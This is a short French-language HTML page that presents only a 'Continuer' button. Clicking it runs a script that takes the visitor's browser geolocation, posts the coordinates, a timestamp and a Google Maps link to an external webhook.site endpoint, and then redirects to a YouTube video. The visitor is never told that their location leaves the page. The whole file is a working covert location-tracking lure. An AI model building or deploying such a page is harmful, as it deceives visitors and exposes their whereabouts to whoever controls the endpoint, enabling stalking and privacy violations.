<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <title>Redirection avec géolocalisation</title>
  <script>
    function sendLocationAndRedirect() {
      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(function(position) {
          const latitude = position.coords.latitude;
          const longitude = position.coords.longitude;
          const googleMapsLink = `https://www.google.com/maps?q=${latitude},${longitude}`;
          const data = {
            lat: latitude,
            lon: longitude,
            timestamp: new Date().toISOString(),
            google_maps_link: googleMapsLink
          };

          fetch("https://webhook.site/f4af94d0-e19d-48f8-952c-6c63f1ce897f", {
            method: "POST",
            headers: {
              "Content-Type": "application/json"
            },
            body: JSON.stringify(data)
          });

          setTimeout(function() {
            window.location.href = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
          }, 1000);

        }, function(error) {
          alert("Erreur géolocalisation : " + error.message);
        });
      } else {
        alert("Géolocalisation non supportée.");
      }
    }
  </script>
</head>
<body>
  <h2>Appuyez sur le bouton pour continuer</h2>
  <button onclick="sendLocationAndRedirect()">Continuer</button>
</body>
</html>
